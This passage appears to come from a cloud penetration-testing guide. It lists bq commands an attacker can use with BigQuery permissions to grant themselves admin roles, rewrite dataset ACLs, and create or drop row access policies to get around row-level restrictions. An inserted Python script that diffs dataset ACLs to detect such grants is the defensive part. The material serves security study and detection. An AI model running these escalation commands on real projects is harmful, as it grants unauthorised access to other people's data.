```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
  --member='user:<email>' \
  --role='roles/bigquery.admin' \
  <proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
```
### bigquery.datasets.update, (bigquery.datasets.get)

This permission alone allows you to update your access to a BigQuery dataset by modifying the ACL that indicates who can access it:

```bash
# Download current permissions, requires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json

## Give permissions to the desired user (add the entry to acl.json, then upload it)
bq update --source acl.json <proj>:<dataset>

## Read it with
bq head $PROJECT_ID:<dataset>.<table>
```
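From the defender's side, an added example (not part of the original page): diff a dataset's access list, as dumped by `bq show --format=prettyjson`, against a reviewed baseline so that an appended OWNER/WRITER entry or a public special group stands out. Both ACL documents are constructed sample data.

```python
"""Diff a BigQuery dataset ACL (the JSON `bq show --format=prettyjson` emits)
against a reviewed baseline and flag risky additions. Sample data is constructed."""
import json

PRIVILEGED_ROLES = {"OWNER", "WRITER"}          # can change data or the ACL itself
RISKY_SPECIAL_GROUPS = {"allAuthenticatedUsers", "allUsers"}  # public exposure
PRINCIPAL_KEYS = ("userByEmail", "groupByEmail", "domain", "specialGroup", "iamMember")

# Constructed baseline: the dataset's access list at the last review.
BASELINE = json.dumps({"access": [
    {"role": "OWNER", "specialGroup": "projectOwners"},
    {"role": "WRITER", "specialGroup": "projectWriters"},
    {"role": "READER", "specialGroup": "projectReaders"},
    {"role": "READER", "groupByEmail": "analysts@example.com"},
]})
# Constructed current state: one OWNER entry for a single user was appended,
# which is what a `bq update --source acl.json` edit looks like afterwards.
CURRENT = json.dumps({"access": json.loads(BASELINE)["access"] + [
    {"role": "OWNER", "userByEmail": "someone@example.com"},
]})

def acl_triple(entry):
    """Normalise one access entry to (role, principal_kind, principal)."""
    for key in PRINCIPAL_KEYS:
        if key in entry:
            return entry.get("role", ""), key, entry[key]
    # view/routine grants carry no role; fingerprint them by their JSON
    return "", "other", json.dumps(entry, sort_keys=True)

def diff_acl(baseline_json, current_json):
    """Return (added, removed) sets of triples between the two ACL documents."""
    base = {acl_triple(e) for e in json.loads(baseline_json).get("access", [])}
    cur = {acl_triple(e) for e in json.loads(current_json).get("access", [])}
    return cur - base, base - cur

def flag_acl(baseline_json, current_json):
    """Return findings; any HIGH line is a candidate for an alert."""
    added, removed = diff_acl(baseline_json, current_json)
    findings = []
    for role, kind, who in sorted(added):
        high = role in PRIVILEGED_ROLES or who in RISKY_SPECIAL_GROUPS
        findings.append(f"{'HIGH' if high else 'INFO'}: added {role} {kind}={who}")
    for role, kind, who in sorted(removed):
        findings.append(f"INFO: removed {role} {kind}={who}")
    return findings

if __name__ == "__main__":
    print("\n".join(flag_acl(BASELINE, CURRENT)))
```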
### bigquery.tables.setIamPolicy

An attacker can abuse this permission to give themselves more permissions over a BigQuery table:

```bash
# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
  --member='user:<email>' \
  --role='roles/bigquery.admin' \
  <proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy
```
```bash
# An example filter was used
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");'
```
```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'

# Remove all (if it's the last row policy on the table you need to use this)
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'
```
Another potential option to bypass row access policies is to directly change the value of the restricted data. If you can only see data when `term` is `Cfba`, just modify all the records in the table to `term = "Cfba"`. However, this is blocked in BigQuery.